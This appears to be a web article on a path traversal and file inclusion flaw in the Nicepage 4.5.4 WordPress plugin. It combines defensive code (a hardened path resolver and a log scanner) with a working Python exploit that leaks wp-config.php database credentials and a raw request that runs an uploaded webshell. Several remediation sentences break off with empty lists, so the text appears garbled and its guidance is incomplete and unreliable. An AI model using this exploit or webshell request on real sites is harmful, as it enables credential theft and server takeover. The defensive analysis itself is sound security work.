Nicepage 4.5.4 Exploit

The Nicepage team released version 4.5.5 and subsequent patches (4.6.0+) that:

Action: Go to WordPress Admin > Plugins > Installed Plugins and update Nicepage to the latest version (4.10+ as of 2025).

The nicepage_activate_theme function was designed to import demo content and themes. However, version 4.5.4 did not validate the template parameter (neither its contents nor its encoding) before using it to build a file path. An attacker could therefore supply path traversal sequences (e.g., ../../) followed by the path of an arbitrary file on the server, which the function would then include.
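To make the flaw concrete, here is an added illustration (written for this page, not Nicepage's own code) of the vulnerable pattern next to a hardened one. The templates directory, the allow-listed name format and the function names are assumptions; the point is that the template value is decoded, allow-listed and then checked to still canonicalize inside the templates directory, so both plain and percent-encoded traversal is rejected.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Hypothetical templates directory; an illustration, not Nicepage's real layout.
TEMPLATE_DIR = "/var/www/html/wp-content/plugins/nicepage/templates"

# Only bare template names are acceptable: no slashes, dots or encoded bytes.
TEMPLATE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def vulnerable_resolve(template: str) -> str:
    """The flawed pattern: join the user-controlled value onto the directory
    and trust the result. '../' segments simply walk out of TEMPLATE_DIR."""
    return os.path.normpath(os.path.join(TEMPLATE_DIR, template))


def safe_resolve(template: str) -> Optional[str]:
    """Hardened pattern: decode first, allow-list the name, then confirm the
    canonical path is still inside TEMPLATE_DIR. Returns None on rejection."""
    # Decode twice so "..%252F" (double-encoded) is caught as well as "..%2F".
    decoded = unquote(unquote(template))
    if not TEMPLATE_NAME.fullmatch(decoded):
        return None
    base = os.path.realpath(TEMPLATE_DIR)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Defense in depth: even a name that passed the allow-list must canonicalize
    # to a location under the templates directory.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    attack = "../../../../wp-config.php"
    print("vulnerable:", vulnerable_resolve(attack))   # /var/www/html/wp-config.php
    print("hardened:  ", safe_resolve(attack))         # None
    print("hardened:  ", safe_resolve("demo-theme"))   # path inside TEMPLATE_DIR
```

The allow-list alone is enough to stop this bug; the realpath containment check is kept because it also catches symlinked template entries that an allow-listed name might resolve through.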

If your site currently runs Nicepage 4.5.4, consider it compromised. Follow these steps immediately:

Security researchers released a minimal Python script to demonstrate the vulnerability:

import requests

# Target site and the traversal payload pointing at the WordPress config file.
target = "http://victim-site.com"
payload = "../../../../wp-config.php"

# The vulnerable AJAX action and the unvalidated template parameter.
data = {"action": "nicepage_activate_theme", "template": payload}

r = requests.post(f"{target}/wp-admin/admin-ajax.php", data=data)

# wp-config.php defines DB_NAME, so its presence in the response means the file was included.
if "DB_NAME" in r.text:
    print("[!] Exploit successful! Database credentials leaked.")
    print(r.text[:500])
else:
    print("[-] Target may be patched.")

Running this against a vulnerable Nicepage 4.5.4 installation would return the contents of wp-config.php, including the database credentials.

The more severe variant involved uploading a webshell. Attackers would combine the LFI with a separate file upload vector (e.g., via the plugin's media import feature) to place a PHP payload (e.g., malicious.jpg.php) in a temp directory, then use the exploit to include and execute it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

action=nicepage_activate_theme&template=../../../../wp-content/uploads/nicepage_temp/cmd.php
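Both request shapes above are easy to hunt for, with one caveat: ordinary web server access logs do not record POST bodies, so the action and template parameters are only visible in a WAF log, a request-body logging module, or a proxy capture. The following added example (written for this page; the JSON record format and the sample lines are constructed, not real traffic or a Nicepage artifact) parses such records, looks for the nicepage_activate_theme action, and flags template values that contain a traversal segment after percent-decoding.

```python
import json
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote

# Constructed sample records, one JSON object per line, in the shape a WAF or
# request-body logging module might emit. The first two are attack attempts,
# the third is a legitimate template name, the fourth is an unrelated action.
SAMPLE_LOG = """\
{"ip": "203.0.113.10", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=nicepage_activate_theme&template=../../../../wp-config.php"}
{"ip": "203.0.113.11", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=nicepage_activate_theme&template=..%2F..%2F..%2F..%2Fwp-content%2Fuploads%2Fnicepage_temp%2Fcmd.php"}
{"ip": "198.51.100.5", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=nicepage_activate_theme&template=demo-theme"}
{"ip": "198.51.100.6", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=heartbeat&_nonce=abc"}
"""

# A ".." path segment on its own, delimited by a slash, backslash, start or end.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def is_traversal(value: str) -> bool:
    """True if the value contains a '..' segment once percent-encoding is undone
    (decoded twice so double-encoded variants are not missed)."""
    return bool(TRAVERSAL.search(unquote(unquote(value))))


def find_exploit_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request that targets the vulnerable AJAX action
    with a traversal sequence in its template parameter."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if not rec.get("uri", "").endswith("/wp-admin/admin-ajax.php"):
            continue
        # admin-ajax.php reads parameters from either the query string or the
        # body, so check both fields when the log provides them.
        raw = "&".join(p for p in (rec.get("query", ""), rec.get("body", "")) if p)
        params = parse_qs(raw, keep_blank_values=True)  # parse_qs decodes %XX once
        if params.get("action", [""])[0] != "nicepage_activate_theme":
            continue
        template = params.get("template", [""])[0]
        if is_traversal(template):
            hits.append({"ip": rec["ip"], "template": unquote(unquote(template))})
    return hits


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(f"[!] {hit['ip']} attempted traversal via template={hit['template']}")
```

Hits whose decoded template points under wp-content/uploads, as in the second sample, are the ones to treat as a possible webshell stage: the file named there should be checked for on disk before anything else.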

Once the webshell runs, the attacker has the privileges of the web server user, allowing:
